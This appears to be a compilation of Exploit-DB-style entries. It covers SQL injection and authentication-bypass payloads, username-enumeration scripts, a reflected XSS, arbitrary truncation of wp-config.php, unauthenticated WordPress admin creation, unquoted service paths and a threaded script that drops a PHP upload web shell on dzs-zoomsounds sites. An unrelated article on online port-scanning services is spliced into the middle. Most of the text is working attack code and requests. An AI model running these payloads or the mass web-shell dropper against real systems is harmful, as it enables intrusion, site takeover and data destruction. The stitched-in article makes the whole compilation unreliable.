
# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10


# Vulnerable Code

Line 2 of "mvogms/products/view_product.php" interpolates the untrusted GET parameter `id` straight into the SQL string (no prepared statement, no casting):

$qry = $conn->query("SELECT  p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");

# Sqlmap command:

sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch

# Output:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=products/view_product&id=3' AND 9973=9973-- ogag

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ
            
# Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux 




# Vulnerable Code

line 57 in file "/sqgs/Actions.php"

@$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];


Steps To Reproduce:
* - Go to the login page http://localhost/sqgs/login.php

Payload:

username: admin ' or '1'='1'#--
password: \



Proof of Concept :

POST /sqgs/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: http://localhost
Connection: close
Referer: http://localhost/sqgs/login.php
Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v

username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi
            
# Exploit Title: ServiceNow - Username Enumeration
# Google Dork: NA
# Date: 12 February 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2021-45901/
# Vendor Homepage: https://www.servicenow.com/
# Software Link: https://docs.servicenow.com/bundle/orlando-servicenow-platform/page/product/mid-server/task/t_DownloadMIDServerFiles.html
# Version: Orlando
# Tested on: MAC OSX
# CVE : CVE-2021-45901

#!/usr/local/bin/python3
# Author: Victor Hanna (SpiderLabs)
# User enumeration script SNOW
# Requires: an anonymous JSESSIONID (plus the glide_user_route cookie) from the landing page and the pwd_csrf_token scraped from $pwd_reset.do. The X-UserToken header is NOT sent in this version (the extraction and header are left commented out below).

import requests
import re
import urllib.parse
from colorama import init
from colorama import Fore, Back, Style
import sys
import os
import time

from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def banner():
    """Print the fixed tool header: author, description, usage line and prerequisite."""
    border = "[+]********************************************************************************[+]"
    author = "|   Author : Victor Hanna (9lyph)[" + Fore.RED + "SpiderLabs" + Style.RESET_ALL + "]\t\t\t\t\t    |"
    usage = "|   Usage : " + sys.argv[0] + "                                                        |"
    rows = (
        border,
        author,
        "|   Decription: SNOW Username Enumerator                                            |",
        usage,
        "|   Prequisite: \'users.txt\' needs to contain list of users                          |",
        border,
    )
    for row in rows:
        print(row)

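def _record(line, path="enumeratedUserList.txt"):
    """Append one plain-text result line to *path* (ANSI colour codes are kept out of the file)."""
    with open(path, "a", encoding="utf-8") as out:
        out.write(line + "\n")


def _extract_csrf_token(page):
    """Return the pwd_csrf_token value embedded in the reset page, or None when the marker is absent.

    Mirrors the original fixed-offset slice (45..73 characters after the
    marker). The offset depends on the page's markup, so a layout change
    yields garbage rather than an error - TODO confirm against the live page.
    """
    marker = "pwd_csrf_token"
    index = page.find(marker)
    if index == -1:
        return None
    return page[index + 45:index + 73]


def main():
    """Enumerate ServiceNow accounts through the password-reset identity check.

    Flow: fetch an anonymous session (JSESSIONID / glide_user_route cookies),
    then for every name in ``users.txt`` load ``$pwd_reset.do`` to obtain a
    CSRF token and POST it to ``xmlhttp.do`` (PwdAjaxVerifyIdentity). The
    response body is classified by substring ("500" -> invalid, "200" ->
    valid). Results are printed and appended to ``enumeratedUserList.txt``.

    Side effects: clears the terminal, routes all traffic through the local
    proxy at 127.0.0.1:8080 with TLS verification disabled (intended for
    interception), and exits the process on timeout / proxy / missing-cookie
    errors.

    Fixes vs. the original: a missing cookie or a reset page without a CSRF
    token no longer crashes the loop with KeyError/IndexError; the result
    file is closed via ``with`` and contains plain text; blank lines in
    users.txt are skipped; the hard-coded Content-Length header is dropped
    because requests computes it from the body.
    """
    os.system('clear')
    banner()
    proxies = {
        "http": "http://127.0.0.1:8080/",
        "https": "http://127.0.0.1:8080/",
    }
    base = "http://<redacted>/"
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0"
    try:
        # verify=False on purpose: traffic is meant to go through the local intercepting proxy.
        r = requests.get(base, timeout=10, verify=False, proxies=proxies)
        JSESSIONID = r.cookies["JSESSIONID"]
        glide_user_route = r.cookies["glide_user_route"]
        startTime = str(time.time_ns())
    except requests.exceptions.Timeout:
        print("[!] Connection to host timed out !")
        sys.exit(1)
    except requests.exceptions.ProxyError:
        print("[!] Can't communicate with proxy !")
        sys.exit(1)
    except KeyError as missing:
        print(f"[!] Target did not set the expected cookie {missing} !")
        sys.exit(1)

    with open("users.txt", "r") as f:
        usernames = f.readlines()
    print("[+] Brute forcing ....")

    reset_url = "http://<redacted>/$pwd_reset.do?sysparm_url=ss_default"
    post_url = "http://<redacted>/xmlhttp.do"
    for users in usernames:
        name = users.strip()
        if not name:
            continue  # don't probe an empty username for a blank line

        headers1 = {
            "Host": "<redacted>",
            "User-Agent": user_agent,
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Connection": "close",
            "Cookie": "glide_user_route=" + glide_user_route + "; JSESSIONID=" + JSESSIONID + "; __CJ_g_startTime=\'" + startTime[:-6] + "\'",
        }
        try:
            r = requests.get(reset_url, headers=headers1, timeout=20, verify=False, proxies=proxies)
        except requests.exceptions.Timeout:
            print("[!] Connection to host timed out !")
            sys.exit(1)

        token = _extract_csrf_token(r.text)
        if token is None:
            # Original crashed here with IndexError; skip the name instead.
            print(Fore.RED + f"[!] No pwd_csrf_token in reset page for {name}; skipping" + Style.RESET_ALL)
            continue
        startTime2 = str(time.time_ns())

        headers2 = {
            "Host": "<redacted>",
            "User-Agent": user_agent,
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            # "ss default" (with a space) is reproduced from the original capture.
            "Referer": "http://<redacted>/$pwd_reset.do?sysparm_url=ss default",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "Origin": "http://<redacted>/",
            "Connection": "keep-alive",
            # X-UserToken is deliberately not sent (see header comment at the top of the script).
            "Cookie": "glide_user_route=" + glide_user_route + ";JSESSIONID=" + JSESSIONID + "; __CJ_g_startTime=\'" + startTime2[:-6] + "\'",
        }
        data = {
            "sysparm_processor": "PwdAjaxVerifyIdentity",
            "sysparm_scope": "global",
            "sysparm_want_session_messages": "true",
            "sysparm_name": "verifyIdentity",
            "sysparm_process_id": "c6b0c20667100200a5a0f3b457415ad5",
            "sysparm_processor_id_0": "fb9b36b3bf220100710071a7bf07390b",
            "sysparm_user_id_0": name,
            "sysparm_identification_number": "1",
            "sysparam_pwd_csrf_token": token,
            "ni.nolog.x_referer": "ignore",
            "x_referer": "$pwd_reset.do?sysparm_url=ss_default",
        }
        payload_str = urllib.parse.urlencode(data, safe=":+")

        try:
            time.sleep(2)  # pacing between identity checks, as in the original
            r = requests.post(post_url, headers=headers2, data=payload_str, timeout=20, verify=False, proxies=proxies)
        except KeyboardInterrupt:
            sys.exit()
        except requests.exceptions.Timeout:
            print("[!] Connection to host timed out !")
            sys.exit(1)
        except requests.exceptions.RequestException as err:
            # Narrowed from a bare `except Exception` so programming errors still surface.
            print(Fore.RED + f"Unable to connect to host ({type(err).__name__})" + Style.RESET_ALL)
            continue

        # Classification is a substring test on the response BODY, not on the HTTP
        # status code; kept as in the original, but any body that merely contains
        # "500" or "200" will be misclassified - TODO confirm against real responses.
        if "500" in r.text:
            colour, verdict = Fore.RED, f"[-] Invalid user: {name}"
        elif "200" in r.text:
            colour, verdict = Fore.GREEN, f"[+] Valid user: {name}"
        else:
            colour, verdict = Fore.RED, f"[-] Invalid user: {name}"
        print(colour + verdict + Style.RESET_ALL)
        _record(verdict)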

if __name__ == "__main__":
    # Entry point: main() expects users.txt in the working directory and an intercepting proxy on 127.0.0.1:8080.
    main ()
            
# Exploit Title: H3C SSL VPN - Username Enumeration
# Exploit Author: LiquidWorm

H3C SSL VPN Username Enumeration


Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd.
Product web page: https://www.h3c.com
Affected version: n/a

Summary: H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees
to access corporate networks remotely in an easy and secure way. The H3C SSL VPN devices are a
new generation of professional SSL VPN devices for enterprises. They can function as ingress
gateways as well as proxy gateways of internal server clusters. The SecPath SSL VPN devices are
for small-to medium-sized enterprises, while the SecBlade SSL VPN devices are for medium-sized
enterprises.

Desc: The weakness lies in how the login script verifies the supplied credentials: it returns a different
error message for an unknown user ("User is not exist"), a wrong password ("Input password incorrect") and a
disabled account ("Local user state is inactive"). An attacker can use these distinguishable responses to
enumerate valid users on the affected application via the 'txtUsrName' POST parameter.

Tested on: ssl vpn gateway HttpServer 1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5697
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5697.php


24.01.2022

--


Non-valid:
----------

POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi

txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=root&txtPassword=123456&selDomain=1&authmethod=1&vldCode=


		<tr><td align="center">User is not exist</TD></TR>



Valid:
------

POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi

txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=administrator&txtPassword=123456&selDomain=1&authmethod=1&vldCode=

		<tr><td align="center">Input password incorrect</TD></TR>



Valid:
------

POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi

txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=guest&txtPassword=123456&selDomain=1&authmethod=1&vldCode=

		<tr><td align="center">Local user state is inactive</TD></TR>
            
# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
# Date: 2022-02-15
# Exploit Author: Aryan Chehreghani
# Contact: aryanchehreghani@yahoo.com
# Vendor Homepage: https://www.teamspeak.com
# Software Link: https://www.teamspeak.com/en/downloads
# Version: 3.5.6 
# Tested on: Windows 10 x64

# [ About - TeamSpeak ]:
#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),
#application for audio communication between users on a chat channel,
#much like a telephone conference call, Users typically use headphones with a microphone,
#The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,
#The target audience for TeamSpeak is gamers, who can use the software to communicate,
#with other players on the same team of a multiplayer video game,
#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.

# [ Description ]:
#The TeamSpeak client is installed under the user's profile (C:\Users\<user>\AppData\Local\TeamSpeak 3 Client).
#The author reports that folder and file permissions were incorrectly configured during installation, making it possible to replace the executables.
#Caveat: the icacls output below lists only NT AUTHORITY\SYSTEM, BUILTIN\Administrators and the local Administrator with Full control (F); it does not show a low-privileged principal with write access, nor a service or scheduled task that would run a replaced binary with higher privileges, so the escalation claim is not demonstrated by this listing.

# [ POC ]:

C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe

createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)

error_report.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 WIN-FREMP1UB3LB\Administrator:(F)

package_inst.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 WIN-FREMP1UB3LB\Administrator:(F)

QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
                       BUILTIN\Administrators:(F)
                       WIN-FREMP1UB3LB\Administrator:(F)

ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)

Uninstall.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              WIN-FREMP1UB3LB\Administrator:(F)

update.exe NT AUTHORITY\SYSTEM:(F)
           BUILTIN\Administrators:(F)
           WIN-FREMP1UB3LB\Administrator:(F)

Successfully processed 7 files; Failed processing 0 files

# [ Exploit - Privilege Escalation ]:
#Replace ts3client_win32.exe, update.exe, package_inst.exe, QtWebEngineProcess.exe, createfileassoc.exe (or any of the other executables)
#with a malicious executable of your choice and wait for it to be launched. Escalation to SYSTEM or Administrator only follows if a higher-privileged principal later runs the replaced binary (e.g. an administrator launching the updater); the listing above does not establish that, so verify it before reporting this as a privilege escalation.
            
# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Author: Luis Martinez
# Discovery Date: 2022-02-13
# Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
# Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
# Tested Version: NVR304-16EP
# Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
# CVE: N/A

# Proof of Concept:

http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>
            

When you occasionally need to scan an IP address, or want to hide the IP you are scanning from, have you considered alternatives to Nmap? This article recommends five useful websites for that purpose.

The drawback of online Nmap-style scanners is that you cannot easily run Nmap scripts (NSE) the way you can from a terminal. Most online scanning services also only check the most popular ports.

01 IPV6Scanner

As the name implies, IPV6Scanner.com is a network scanner that allows any user to perform port scanning for any hostname, IPV4 or IPv6-based address.

Its simple interface only requires you to enter the target and click Scan to run a default scan of the most common server ports.

02 Nmap.online

Nmap Online is probably the most classic alternative to Nmap: a web-based application rather than a tool running in the terminal.

It provides a simple interface to scan any domain or IP address, and you can choose the type of scan you want to perform, such as fast scan, port scan, operating system detection, or tracking routing.

After the scan completes you get Nmap results listing open, filtered and closed ports in the same format as traditional Nmap, as shown below.

Scan results are shown below. Scan types: Quick Scan is probably the most commonly used option, scanning the 100 most common ports. Port Scan performs a TCP scan of ports 21, 22, 25, 80, 110, 143, 443 and 445 with service detection enabled, so you get information about the services running remotely. OS Detection identifies the operating system running on the remote host.

03 Shodan

Shodan is a search engine that indexes data from any internet-connected device: computers, servers, mobile phones, webcams, smart TVs, refrigerators, smart kitchen appliances, medical devices, traffic lights and other IoT devices.

Scan results cmrycplvgma4416.jpg

As shown above, it can accurately obtain the target open port and corresponding port information. In addition to port information, you also get detailed information about the IP, such as the country, organization, ISP, last update date, associated hostname, ASN, and running web technologies found on that IP, and more.

04 ZoomEye

Developed by the Chinese cybersecurity company Knownsec Inc., ZoomEye is an IoT search engine positioned as a search engine for cyberspace. Like Shodan, ZoomEye also provides port-scan data.

The example below shows an exposed port 22 together with the operating system, tags, geolocation, the software version listening on that port and per-port statistics.

Of course, ZoomEye also supports more advanced syntax, so let’s give a brief example below.

Query syntax (operator - meaning - example):
- space - OR logic: `service:"ssh" service:"http"` returns data for the ssh or http protocol.
- `+` - AND logic: `device:"router" +after:"2020-01-01"` returns router data updated after 2020-01-01.
- `-` - NOT logic: `country:"CN" -subdivisions:"beijing"` returns data in China except Beijing.
- `country:"CN"` - search by country; the abbreviation or the full name both work (`country:"China"`, `country:"china"`).
- `ip:"8.8.8"` - assets in the IP's C-segment (/24); `cidr:52.2.254.36/16` is the B-segment and `cidr:52.2.254.36/8` the A-segment.
- `port:80` - search by port; querying several ports at once is currently not supported.
Other examples can be found on the official website.

05 SurfaceBrowser

SurfaceBrowser is an internet attack-surface analyser that gives you access to a security data platform including current and historical DNS records, complete IP blocks, SSL certificates, hosted domains, associated domains, full subdomain lists, user-agent information per IP and, of course, open ports and running services.

# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
# Date: 09-11-2021
# Exploit Author: Ceylan Bozogullarindan
# Exploit Website: https://bozogullarindan.com
# Vendor Homepage: https://bestwebsoft.com/
# Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
# Version: 1.1.1
# Tested on: Linux
# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)


# Description:

Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!

I have deliberately emphasized the "clear a log file" feature because it can be used to empty (truncate) an arbitrary file on the WordPress host, not just a log. The root cause is that the path of the file to be cleared, supplied in the "rrrlgvwr_clear_file_name" parameter, is not properly validated or restricted to log files. It can only be manipulated by authenticated users (the request below is sent with an admin session).

An attacker can use this vulnerability to take the site down by truncating wp-config.php, or to cover their tracks by clearing the relevant log files.

# Steps To Reproduce

1. Install and activate the plugin.
2. Click the "Log Monitor" available under Error Log Viewer menu item.
3. Choose a log file to clear.
4. Intercept the request via Burp or any other local proxy tool.
5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.
6. Check the content of the cleared file. You will see that the file is empty.


# PoC - Supported Materials

---------------------------------------------------------------------------
POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
Host: 127.0.0.1:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 603
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: [admin+]

rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php
---------------------------------------------------------------------------
            
# Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-13
# Vendor Homepage: https://www.emerson.com/en-us
# Software Link : https://www.opertek.com/descargar-software/?prc=_326
# Tested Version: 9.80 Build 8695
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path: 

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """

Trapi File Server	TrapiServer	C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe	Auto    


# Service info:

C:\>sc qc TrapiServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TrapiServer
        TYPE               : 120  WIN32_SHARE_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Trapi File Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

Because BINARY_PATH_NAME is unquoted and contains spaces, the service control manager tries the truncated candidates in order - `C:\Program.exe`, `C:\Program Files (x86)\Emerson\PAC.exe`, `C:\Program Files (x86)\Emerson\PAC Machine.exe` - before the real `trapiserver.exe`. A local user who can write to one of those directories can plant a binary that runs as LocalSystem the next time the service starts (AUTO_START: at boot or on a manual restart). Caveat: the default ACLs on `C:\` and `C:\Program Files (x86)` only let administrators create files there, so this is exploitable only where those permissions have been loosened; the listing above shows the unquoted path, not a writable directory.
            
# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed


POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339

{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
            
# Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/drfone_full3360.exe
# Tested Version: 11.4.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path: 

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """

Wondershare WSID help	DFWSIDService	C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe	Auto


# Service info:

C:\>sc qc DFWSIDService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DFWSIDService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare WSID help
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

Because BINARY_PATH_NAME is unquoted and contains spaces, the service control manager tries the truncated candidates in order - `C:\Program.exe`, `C:\Program Files (x86)\Wondershare\Wondershare.exe` - before the real `WsidService.exe`. A local user who can write to one of those directories can plant a binary that runs as LocalSystem the next time the service starts (AUTO_START: at boot or on a manual restart). Caveat: the default ACLs on `C:\` and `C:\Program Files (x86)` only let administrators create files there, so this is exploitable only where those permissions have been loosened; the listing above shows the unquoted path, not a writable directory.
            
# Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: inurl:wp-content/plugins/dzs-zoomsounds
# Date: 16/02/2022
# Exploit Author: Overthinker1877 (1877 Team)
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Version: 6.60
# Tested on: Windows / Linux

import os
import requests
import threading
from multiprocessing.dummy import Pool,Lock
from bs4 import BeautifulSoup
import time
import smtplib,sys,ctypes
from random import choice
from colorama import Fore
from colorama import Style
from colorama import init
import re
import time
from time import sleep
init(autoreset=True)  # colorama: reset colour/style automatically after every print()
# Short aliases for the colorama colour codes used in the console output.
fr = Fore.RED
gr = Fore.BLUE  # named "gr" but is BLUE
fc = Fore.CYAN
fw = Fore.WHITE
fy = Fore.YELLOW
fg = Fore.GREEN
# Style aliases; gr, fy, sd, sn and sb are not referenced anywhere in this listing.
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT
# Running tallies updated by finder(): Good = sites where the dropped shell answered,
# Bad = sites that were not vulnerable or where the upload did not take.
Bad = 0
Good = 0
def Folder(directory):
    """Create *directory* (including parents) unless something already exists at that path."""
    if os.path.exists(directory):
        return
    os.makedirs(directory)


# Output directory for the list of successfully dropped shells.
Folder("exploited")
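def clear():
    """Clear the terminal screen (``cls`` on Windows, ``clear`` elsewhere).

    Best-effort: failure to spawn the shell command is ignored so the banner
    flow continues. Only OSError is swallowed (the original used a bare
    ``except`` that also hid programming errors and KeyboardInterrupt).
    """
    command = 'cls' if os.name == 'nt' else 'clear'
    try:
        os.system(command)
    except OSError:
        pass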
def finder(i) :
    """Probe one site for the dzs-zoomsounds savepng.php file write and, if present, drop a PHP uploader.

    i: base URL of the target WordPress site.
    Side effects: updates the module-level Good/Bad counters, appends each
    working shell URL to exploited/shell.txt and rewrites the console title
    with the running totals. Returns None; every error is swallowed.
    """
    global Bad,Good
    head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}
    try :
            x = requests.session()
            # The vulnerable endpoint writes the raw POST body to the file named by ?location=
            listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']
            for script in listaa :
                url = (i+"/"+script)
                while True :
                    req_first = x.get(url, headers=head)
                    # This error text on a bare GET is used as the fingerprint that the endpoint exists.
                    if "error:http raw post data does not exist" in req_first.text :
                        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
                        # PHP upload form; the base64 blob decodes to the "Overthinker1877" marker checked below followed by the HTML form.
                        burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"
                        requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)
                        # Verify the write by fetching the file that savepng.php should have created.
                        urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")
                        req_second = x.get(urlx, headers=head)
                        if "Overthinker1877" in req_second.text :
                            Good = Good + 1
                            print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)
                            with open("exploited/shell.txt","a") as file :
                                file.write(urlx+"\n")
                                file.close()
                        else :
                            Bad = Bad + 1
                            print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")
                    else :
                        Bad = Bad + 1
                        print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")

                        pass
                    # `while True` is only used for its single-pass `break`; the loop never repeats.
                    break
    except :
        # NOTE(review): bare except swallows every failure (network errors, KeyboardInterrupt
        # raised inside requests, typos) without touching the counters - narrow it.
        pass
    if os.name == 'nt':
        ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))
    else :
        sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))

def key_logo():
    """Write the tool title to stdout in a randomly chosen bold ANSI colour, pausing briefly per line."""
    reset = '\x1b[0m'
    palette = [36, 32, 34, 35, 31, 37]
    title = '          [ + ] OVERTHINKER1877 EXPLOIT'
    for text in title.split('\n'):
        colour = choice(palette)
        sys.stdout.write('\x1b[1;%dm%s%s\n' % (colour, text, reset))
        time.sleep(0.05)

def process(line):
    """Unused placeholder worker: sleep one second and ignore *line*.

    Nothing in this listing calls it (run() maps finder() over the pool).
    """
    time.sleep(1)


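def run() :
    """Interactive entry point: show the logo, read the target list and fan finder() out over a thread pool.

    Prompts for a file of base URLs (one per line) and a thread count.
    Fixes vs. the original: the list file is closed via ``with``, the
    ``list`` builtin is no longer shadowed, and a non-numeric thread count
    gives a clear message instead of a ValueError traceback.
    """
    key_logo()
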